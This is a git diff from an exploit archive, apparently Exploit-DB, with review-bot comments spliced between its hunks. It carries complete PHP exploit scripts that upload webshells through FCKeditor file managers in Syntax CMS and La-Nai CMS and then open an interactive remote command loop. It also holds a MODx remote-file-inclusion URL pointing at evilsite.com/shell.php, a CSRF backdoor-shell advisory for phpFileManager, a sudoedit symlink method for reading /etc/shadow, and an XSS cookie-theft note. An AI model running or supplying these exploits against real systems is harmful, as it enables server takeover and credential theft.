 37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
 37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
 37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0
+37710,platforms/linux/local/37710.txt,"Sudo <=1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
+37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,"John Page",php,webapps,80
+37715,platforms/php/webapps/37715.txt,"Tendoo CMS 1.3 - XSS Vulnerabilities",2015-07-29,"Arash Khazaei",php,webapps,80
+37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0
diff --git a/platforms/asp/webapps/23005.txt b/platforms/asp/webapps/23005.txt
index 966be1d80..6f547ef63 100755
--- a/platforms/asp/webapps/23005.txt
+++ b/platforms/asp/webapps/23005.txt
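Review bot: The new 37710 entry's description `Sudo <=1.8.14 - Unauthorized Privilege` is cut short and drops the fault class that the exploit's own header in platforms/linux/local/37710.txt states (`sudo -e - a.k.a. sudoedit - unauthorized privilege escalation`, CVE-2015-5602); since the index is what consumers search, a line such as `37710,platforms/linux/local/37710.txt,"Sudo <= 1.8.14 - 'sudoedit' Unauthorized Privilege Escalation",2015-07-28,"Daniel Svartman",linux,local,0` would match the advisory and the naming pattern of neighbouring rows. The author cell is also lower-cased (`daniel svartman`) where the advisory writes `Daniel Svartman`. Separately, the added 37712 row (phpFileManager 0.9.8 CSRF) carries port 80 while the 37709 row for the same application three lines above uses 0; presumably one of the two is wrong and the pair should agree.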
@@ -1,15 +1,25 @@ - Title: FCKEditor 2.6.8 ASP Version File Upload Protection bypass - Credit goes to: Mostafa Azizi, Soroush Dalili -- Link:http://sourceforge.net/projects/fckeditor/files/FCKeditor/ +- Link: http://sourceforge.net/projects/fckeditor/files/FCKeditor/ - Description: There is no validation on the extensions when FCKEditor 2.6.8 ASP version is dealing with the duplicate files. As a result, it is possible to bypass the protection and upload a file with any extension. + - Reference: http://soroush.secproject.com/blog/2012/11/file-in-the-hole/ - Solution: Please check the provided reference or the vendor website. +- PoC: http://www.youtube.com/v/1VpxlJ5jLO8?version=3&hl=en_US&rel=0&vq=hd720 + +Duplicate files do not have proper validation on their extensions. + +As a result, it is possible to upload any file with any extension on the server by using Null Character. + +Applications on IIS6 can also use "file.asp;gif" pattern. +- Solution: In "config.asp", wherever you have: ConfigAllowedExtensions.Add "File","EXTENSION HERE" Change it to: ConfigAllowedExtensions.Add "File","^(Extensions HERE)$" +- Vulnerability: Vulnerable File: commands.asp Function: FileUpload() Vulnerable Code: sFileName = RemoveExtension( sOriginalFileName ) & "(" & iCounter & ")." & sExtension + + -- PoC:http://www.youtube.com/v/1VpxlJ5jLO8?version=3&hl=en_US&rel=0&vq=hd720 -" Note: Quick patch for FCKEditor 2.6.8 File Upload Bypass: diff --git a/platforms/linux/local/37710.txt b/platforms/linux/local/37710.txt new file mode 100755 index 000000000..6c5e1b9d0 --- /dev/null +++ b/platforms/linux/local/37710.txt 
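Review bot: After this rewrite the advisory carries two `- Solution:` headings, the original pointer (`Please check the provided reference or the vendor website.`) and the new concrete config.asp change; the first is now redundant and a reader skimming headings may stop at it, so the two should be merged under one heading with the config.asp instructions first. The config.asp guidance would also be clearer if it said outright that the value of `ConfigAllowedExtensions.Add "File", ...` is treated as a regular expression matched against the extension, which is why wrapping it as `^( ... )$` closes the duplicate-file bypass; as written the `EXTENSION HERE` placeholder leaves that implicit and someone pasting a plain list will not get a working anchor.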
@@ -0,0 +1,36 @@ +# Exploit Title: sudo -e - a.k.a. sudoedit - unauthorized privilege escalation +# Date: 07-23-2015 +# Exploit Author: Daniel Svartman +# Version: Sudo <=1.8.14 +# Tested on: RHEL 5/6/7 and Ubuntu (all versions) +# CVE: CVE-2015-5602. + +Hello, + +I found a security bug in sudo (checked in the latest versions of sudo +running on RHEL and ubuntu) when a user is granted with root access to +modify a particular file that could be located in a subset of directories. + +It seems that sudoedit does not check the full path if a wildcard is used +twice (e.g. /home/*/*/file.txt), allowing a malicious user to replace the +file.txt real file with a symbolic link to a different location (e.g. +/etc/shadow). + +I was able to perform such redirect and retrieve the data from the +/etc/shadow file. + +In order for you to replicate this, you should configure the following line +in your /etc/sudoers file: + + ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt + +Then, logged as that user, create a subdirectory within its home folder +(e.g. /home//newdir) and later create a symbolic link +inside the new folder named test.txt pointing to /etc/shadow. + +When you run sudoedit /home//newdir/test.txt you will +be allowed to access the /etc/shadow even if have not been granted with +such access in the sudoers file. + +I checked this against fixed directories and files (not using a wildcard) +and it does work with symbolic links created under the /home folder. \ No newline at end of file diff --git a/platforms/php/webapps/2035.php b/platforms/php/webapps/2035.php index 9a9dc970e..8ec2d6f9d 100755 --- a/platforms/php/webapps/2035.php +++ b/platforms/php/webapps/2035.php 
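Review bot: The closing paragraph (`I checked this against fixed directories and files (not using a wildcard) and it does work with symbolic links created under the /home folder`) reads as if rules without wildcards are affected too, which contradicts the earlier statement that the problem appears only when a wildcard is used twice; if "does not work" was intended the sentence should say so, because that is what decides whether existing fixed-path and single-wildcard sudoedit rules need review. The header's `Version: Sudo <=1.8.14` implies a fix in the following release, and a one-line pointer that sudo 1.8.15 added the `sudoedit_checkdir` and `sudoedit_follow` sudoers options (rejecting edits through user-writable directory components and refusing to follow symbolic links, respectively) would give administrators the mitigation the text otherwise lacks. The example path `(e.g. /home//newdir)` and the later `sudoedit /home//newdir/test.txt` have lost the placeholder between the slashes, presumably a `<user>` token stripped as markup, and should be restored with a plain-text placeholder.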
@@ -1,139 +1,139 @@ -#!/usr/bin/php -q -d short_open_tag=on - 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -$port=80; -$proxy=""; -$cmd=""; -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} - -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -$shell=""; -$allowed_extensions = array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"); -for ($i=0; $i<=count($allowed_extensions)-1; $i++){ -$filename="suntzu.php.".$allowed_extensions[$i]; -$data="-----------------------------7d529a1d23092a\r\n"; -$data.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n"; -$data.="Content-Type:\r\n\r\n"; -$data.="$shell\r\n"; -$data.="-----------------------------7d529a1d23092a--\r\n"; -$packet="POST ".$p."engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -//echo $html; -$packet="GET ".$p."data/images/File/".$filename." HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: cmd=".$cmd."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -//echo $html; -if (eregi("Hi Master!",$html)){ -$temp=explode("*delim*",$html); -die($temp[1]);} -} -//if you are here... 
-echo "Exploit failed..."; -?> - -# milw0rm.com [2006-07-18] +#!/usr/bin/php -q -d short_open_tag=on + 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +$port=80; +$proxy=""; +$cmd=""; +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} + +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +$shell=""; +$allowed_extensions = array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"); +for ($i=0; $i<=count($allowed_extensions)-1; $i++){ +$filename="suntzu.php.".$allowed_extensions[$i]; +$data="-----------------------------7d529a1d23092a\r\n"; +$data.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n"; +$data.="Content-Type:\r\n\r\n"; +$data.="$shell\r\n"; +$data.="-----------------------------7d529a1d23092a--\r\n"; +$packet="POST ".$p."engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); +//echo $html; +$packet="GET ".$p."data/images/File/".$filename." HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cookie: cmd=".$cmd."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +sendpacketii($packet); +//echo $html; +if (eregi("Hi Master!",$html)){ +$temp=explode("*delim*",$html); +die($temp[1]);} +} +//if you are here... +echo "Exploit failed..."; +?> + +# milw0rm.com [2006-07-18] diff --git a/platforms/php/webapps/2706.txt b/platforms/php/webapps/2706.txt index e6c975a2a..90e1e8ad6 100755 --- a/platforms/php/webapps/2706.txt +++ b/platforms/php/webapps/2706.txt 
@@ -1,26 +1,26 @@ -+------------------------------------------------------------------------------------------- -+ MODx CMS 0.9.2.1 (base_path) Remote File Include Vulnerability -+------------------------------------------------------------------------------------------- -+ Affected Software .: MODx CMS 0.9.2.1 -+ Vendor ............: http://modxcms.com/ -+ Download ..........: http://modxcms.com/downloads.html -+ Description .......: "MODx is an open source PHP Application Framework that helps you take control of your online content." -+ Dork ..............: "powered by MODx" -+ Class .............: Remote File Inclusion -+ Risk ..............: High (Remote File Execution) -+ Found By ..........: nuffsaid -+------------------------------------------------------------------------------------------- -+ Details: -+ MODx CMS manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php does not initialize -+ the $base_path variable before using it to include files, assuming register_globals = on, -+ we can intialize the variable in a query string and include a remote file of our choice. -+ -+ Vulnerable Code: -+ manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php, line(s) 24: -+ -> include $base_path."manager/media/browser/mcpuk/connectors/php/Commands/helpers/iconlookup.php"; -+ -+ Proof Of Concept: -+ http://[target]/[path]/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://evilsite.com/shell.php? 
-+------------------------------------------------------------------------------------------- - -# milw0rm.com [2006-11-03] ++------------------------------------------------------------------------------------------- ++ MODx CMS 0.9.2.1 (base_path) Remote File Include Vulnerability ++------------------------------------------------------------------------------------------- ++ Affected Software .: MODx CMS 0.9.2.1 ++ Vendor ............: http://modxcms.com/ ++ Download ..........: http://modxcms.com/downloads.html ++ Description .......: "MODx is an open source PHP Application Framework that helps you take control of your online content." ++ Dork ..............: "powered by MODx" ++ Class .............: Remote File Inclusion ++ Risk ..............: High (Remote File Execution) ++ Found By ..........: nuffsaid ++------------------------------------------------------------------------------------------- ++ Details: ++ MODx CMS manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php does not initialize ++ the $base_path variable before using it to include files, assuming register_globals = on, ++ we can intialize the variable in a query string and include a remote file of our choice. ++ ++ Vulnerable Code: ++ manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php, line(s) 24: ++ -> include $base_path."manager/media/browser/mcpuk/connectors/php/Commands/helpers/iconlookup.php"; ++ ++ Proof Of Concept: ++ http://[target]/[path]/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://evilsite.com/shell.php? ++------------------------------------------------------------------------------------------- + +# milw0rm.com [2006-11-03] diff --git a/platforms/php/webapps/37457.html b/platforms/php/webapps/37457.html index 59f016edb..efa176ac9 100755 --- a/platforms/php/webapps/37457.html +++ b/platforms/php/webapps/37457.html 
@@ -6,5 +6,5 @@ An attacker may leverage this issue to execute arbitrary script code in the brow FCKEditor 2.6.7 is vulnerable; prior versions may also be affected. -html>
+
diff --git a/platforms/php/webapps/37712.txt b/platforms/php/webapps/37712.txt new file mode 100755 index 000000000..9cfe22986 --- /dev/null +++ b/platforms/php/webapps/37712.txt 
@@ -0,0 +1,125 @@ +# Exploit Title: CSRF Remote Backdoor Shell +# Google Dork: intitle: CSRF Remote Backdoor Shell +# Date: 2015-07-29 +# Exploit Author: John Page ( hyp3rlinx ) +# Website: hyp3rlinx.altervista.org +# Vendor Homepage: phpfm.sourceforge.net +# Software Link: phpfm.sourceforge.net +# Version: 0.9.8 +# Tested on: windows 7 SP1 +# Category: Webapps + + + + +Vendor: +================================ +phpfm.sourceforge.net + + + +Product: +============================ +phpFileManager version 0.9.8 + + +Vulnerability Type: +========================== +CSRF Remote Backdoor Shell + + + +CVE Reference: +============== +N/A + + + +Advisory Information: +======================================== +CSRF Remote Backdoor Shell Vulnerability + + + + +Vulnerability Details: +======================================================================= +PHP File Manager is vulnerable to creation of arbitrary files on server +via CSRF which we can use to create remote backdoor shell access if victim +clicks our malicious linx or visits our malicious webpages. + +To create backdoor shell we will need to execute two POST requests +1- to create PHP backdoor shell 666.php +2- inject code and save to the backdoor we just created + +e.g. 
+https://localhost/phpFileManager-0.9.8/666.php?cmd=[ OS command ] + + +Exploit code(s): +=============== + + + + + +Disclosure Timeline: +========================================================= +Vendor Notification: July 28, 2015 +July 29, 2015 : Public Disclosure + + + +Severity Level: +========================================================= +High + + + +Description: +========================================================== + + +Request Method(s): [+] POST + + +Vulnerable Product: [+] phpFileManager 0.9.8 + + +Vulnerable Parameter(s): [+] action, cmd_arg, file_data, chmod_arg, +save_file + + +Affected Area(s): [+] Web Server + + +=========================================================== + +[+] Disclaimer +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and that due +credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit is given to +the author. +The author is not responsible for any misuse of the information contained +herein and prohibits any malicious use of all security related information +or exploits by the author or elsewhere. + + +by hyp3rlinx diff --git a/platforms/php/webapps/37715.txt b/platforms/php/webapps/37715.txt new file mode 100755 index 000000000..7436bb8a5 --- /dev/null +++ b/platforms/php/webapps/37715.txt 
@@ -0,0 +1,27 @@ +# Exploit Title: Tendoo CMS Stored And Reflected Xss Vulnerability +# Google Dork: N/A +# Date: 28/7/2015 +# Exploit Author: Arash Khazaei +# Vendor Homepage: http://tendoo.org/ +# Software Link: http://sourceforge.net/projects/tendoo-cms/ +# Version: 1.3 +# Tested on: Kali , Windows +# CVE : N/A +# Contact : 0xclay@gmail.com + +###################### +Introduction : +a Stored And a Reflected XSS Vulnerability In Profile Area In Tendoo CMS +Make CMS Vulnerable And Can Be Used For Stealing Admin Cookies And ....... . +###################### + +Stored Xss In http://localhost/tendoo/index.php/account/update In First +Name and Last Name Inputs +Excute Java Script Codes And If Admin Or Any Body Come In Attacker Profile +When First Name And Last Name Loads +JavaScripts Code Will Be Excuted +POC : + +https://i.leetfil.es/e992ad2d.jpg + +Discovered By Arash Khazaei diff --git a/platforms/php/webapps/5618.txt b/platforms/php/webapps/5618.txt index 368bc9743..845d00007 100755 --- a/platforms/php/webapps/5618.txt +++ b/platforms/php/webapps/5618.txt 
@@ -1,155 +1,155 @@ - 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) ) - 63. SendResults( '202' ) ; - 64. - 65. $sErrorNumber = '0' ; - 66. $sFileUrl = '' ; - 67. - 68. // Initializes the counter used to rename the file, if another one with the same name already exists. - 69. $iCounter = 0 ; - 70. - 71. // The the target directory. - 72. if ( isset( $Config['UserFilesAbsolutePath'] ) ) - 73. $sServerDir = $Config['UserFilesAbsolutePath'] ; - 74. else - 75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ; - 76. $sServerDir = $Config["UserFilesPath"] ; - 77. - 78. while ( true ) - 79. { - 80. // Compose the file path. - 81. $sFilePath = $sServerDir . $sFileName ; - 82. - 83. // If a file with that name already exists. - 84. if ( is_file( $sFilePath ) ) - 85. { - 86. $iCounter++ ; - 87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ; - 88. $sErrorNumber = '201' ; - 89. } - 90. else - 91. { - 92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ; - 93. - 94. if ( is_file( $sFilePath ) ) - 95. { - 96. $oldumask = umask(0) ; - 97. chmod( $sFilePath, 0777 ) ; - 98. umask( $oldumask ) ; - 99. } - 100. - 101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ; - 102. - 103. break ; - 104. 
} - - with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code -*/ - -error_reporting(0); -set_time_limit(0); -ini_set("default_socket_timeout", 5); - -function http_send($host, $packet) -{ - $sock = fsockopen($host, 80); - while (!$sock) - { - print "\n[-] No response from {$host}:80 Trying again..."; - $sock = fsockopen($host, 80); - } - fputs($sock, $packet); - while (!feof($sock)) $resp .= fread($sock, 1024); - fclose($sock); - return $resp; -} - -print "\n+------------------------------------------------------------+"; -print "\n| La-Nai CMS <= 1.2.16 Arbitrary File Upload Exploit by EgiX |"; -print "\n+------------------------------------------------------------+\n"; - -if ($argc < 2) -{ - print "\nUsage......: php $argv[0] host path"; - print "\nExample....: php $argv[0] localhost /lanai-cms/\n"; - die(); -} - -$host = $argv[1]; -$path = $argv[2]; - -$data = "--12345\r\n"; -$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n"; -$data .= "Content-Type: application/octet-stream\r\n\r\n"; -$data .= "\n"; -$data .= "--12345--\r\n"; - -$packet = "POST {$path}include/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n"; -$packet .= "Host: {$host}\r\n"; -$packet .= "Content-Length: ".strlen($data)."\r\n"; -$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; -$packet .= "Connection: close\r\n\r\n"; -$packet .= $data; - -preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html); - -if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! 
(Error {$html[1]})\n"); -else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n"; - -define(STDIN, fopen("php://stdin", "r")); - -while(1) -{ - print "\nlanai-shell# "; - $cmd = trim(fgets(STDIN)); - if ($cmd != "exit") - { - $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n"; - $packet.= "Host: {$host}\r\n"; - $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; - $packet.= "Connection: close\r\n\r\n"; - $output = http_send($host, $packet); - if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n"); - $shell = explode("_code_", $output); - print "\n{$shell[1]}"; - } - else break; -} - -?> - -# milw0rm.com [2008-05-14] + 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) ) + 63. SendResults( '202' ) ; + 64. + 65. $sErrorNumber = '0' ; + 66. $sFileUrl = '' ; + 67. + 68. // Initializes the counter used to rename the file, if another one with the same name already exists. + 69. $iCounter = 0 ; + 70. + 71. // The the target directory. + 72. if ( isset( $Config['UserFilesAbsolutePath'] ) ) + 73. $sServerDir = $Config['UserFilesAbsolutePath'] ; + 74. else + 75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ; + 76. $sServerDir = $Config["UserFilesPath"] ; + 77. + 78. while ( true ) + 79. { + 80. // Compose the file path. + 81. $sFilePath = $sServerDir . $sFileName ; + 82. + 83. // If a file with that name already exists. + 84. if ( is_file( $sFilePath ) ) + 85. { + 86. $iCounter++ ; + 87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ; + 88. $sErrorNumber = '201' ; + 89. } + 90. else + 91. { + 92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ; + 93. + 94. if ( is_file( $sFilePath ) ) + 95. { + 96. $oldumask = umask(0) ; + 97. chmod( $sFilePath, 0777 ) ; + 98. umask( $oldumask ) ; + 99. } + 100. + 101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ; + 102. + 103. break ; + 104. 
} + + with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code +*/ + +error_reporting(0); +set_time_limit(0); +ini_set("default_socket_timeout", 5); + +function http_send($host, $packet) +{ + $sock = fsockopen($host, 80); + while (!$sock) + { + print "\n[-] No response from {$host}:80 Trying again..."; + $sock = fsockopen($host, 80); + } + fputs($sock, $packet); + while (!feof($sock)) $resp .= fread($sock, 1024); + fclose($sock); + return $resp; +} + +print "\n+------------------------------------------------------------+"; +print "\n| La-Nai CMS <= 1.2.16 Arbitrary File Upload Exploit by EgiX |"; +print "\n+------------------------------------------------------------+\n"; + +if ($argc < 2) +{ + print "\nUsage......: php $argv[0] host path"; + print "\nExample....: php $argv[0] localhost /lanai-cms/\n"; + die(); +} + +$host = $argv[1]; +$path = $argv[2]; + +$data = "--12345\r\n"; +$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n"; +$data .= "Content-Type: application/octet-stream\r\n\r\n"; +$data .= "\n"; +$data .= "--12345--\r\n"; + +$packet = "POST {$path}include/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Content-Length: ".strlen($data)."\r\n"; +$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; +$packet .= "Connection: close\r\n\r\n"; +$packet .= $data; + +preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html); + +if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! 
(Error {$html[1]})\n"); +else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n"; + +define(STDIN, fopen("php://stdin", "r")); + +while(1) +{ + print "\nlanai-shell# "; + $cmd = trim(fgets(STDIN)); + if ($cmd != "exit") + { + $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n"; + $packet.= "Host: {$host}\r\n"; + $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; + $packet.= "Connection: close\r\n\r\n"; + $output = http_send($host, $packet); + if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n"); + $shell = explode("_code_", $output); + print "\n{$shell[1]}"; + } + else break; +} + +?> + +# milw0rm.com [2008-05-14] diff --git a/platforms/php/webapps/5688.php b/platforms/php/webapps/5688.php index 00b9fa41c..1a9816eb7 100755 --- a/platforms/php/webapps/5688.php +++ b/platforms/php/webapps/5688.php 
@@ -1,144 +1,144 @@ - special THanks to EgiX For the Exploit Code - - author...: Stack - mail.....: Ev!L - descr: - if the web site change the name of path or path is /public/ you can delet /public/ in the exploit - in the line : - "POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php - [-] vulnerable code in /public/fckeditor/editor/filemanager/upload/php/upload.php - - 41. // Get the posted file. - 42. $oFile = $_FILES['NewFile'] ; - 43. - 44. // Get the uploaded file name and extension. - 45. $sFileName = $oFile['name'] ; - 46. $sOriginalFileName = $sFileName ; - 47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ; - 48. $sExtension = strtolower( $sExtension ) ; - 49. - 50. // The the file type (from the QueryString, by default 'File'). - 51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ; - 52. - 53. // Check if it is an allowed type. - 54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) ) - 55. SendResults( 1, '', '', 'Invalid type specified' ) ; - 56. - 57. // Get the allowed and denied extensions arrays. - 58. $arAllowed = $Config['AllowedExtensions'][$sType] ; - 59. $arDenied = $Config['DeniedExtensions'][$sType] ; - 60. - 61. // Check if it is an allowed extension. - 62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) ) - 63. SendResults( '202' ) ; - 64. - 65. $sErrorNumber = '0' ; - 66. $sFileUrl = '' ; - 67. - 68. // Initializes the counter used to rename the file, if another one with the same name already exists. - 69. $iCounter = 0 ; - 70. - 71. // The the target directory. - 72. if ( isset( $Config['UserFilesAbsolutePath'] ) ) - 73. $sServerDir = $Config['UserFilesAbsolutePath'] ; - 74. else - 75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ; - 76. $sServerDir = $Config["UserFilesPath"] ; - 77. - 78. while ( true ) - 79. { - 80. // Compose the file path. - 81. $sFilePath = $sServerDir . 
$sFileName ; - 82. - 83. // If a file with that name already exists. - 84. if ( is_file( $sFilePath ) ) - 85. { - 86. $iCounter++ ; - 87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ; - 88. $sErrorNumber = '201' ; - 89. } - 90. else - 91. { - 92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ; - 93. - 94. if ( is_file( $sFilePath ) ) - 95. { - 96. $oldumask = umask(0) ; - 97. chmod( $sFilePath, 0777 ) ; - 98. umask( $oldumask ) ; - 99. } - 100. - 101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ; - 102. - 103. break ; - - with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code -*/ -error_reporting(0); -set_time_limit(0); -ini_set("default_socket_timeout", 5); -function http_send($host, $packet) -{ - $sock = fsockopen($host, 80); - while (!$sock) - { - print "\n[-] No response from {$host}:80 Trying again..."; - $sock = fsockopen($host, 80); - } - fputs($sock, $packet); - while (!feof($sock)) $resp .= fread($sock, 1024); - fclose($sock); - return $resp; -} -print "\n+------------------------------------------------------------+"; -print "\n| Syntax CMS <= 1.3 Arbitrary File Upload Exploit by Stack |"; -print "\n+------------------------------------------------------------+\n"; -if ($argc < 2) -{ - print "\nUsage......: php $argv[0] host path"; - print "\nExample....: php $argv[0] localhost /Syntax/\n"; - die(); -} -$host = $argv[1]; -$path = $argv[2]; -$data = "--12345\r\n"; -$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n"; -$data .= "Content-Type: application/octet-stream\r\n\r\n"; -$data .= "\n"; -$data .= "--12345--\r\n"; -$packet = "POST 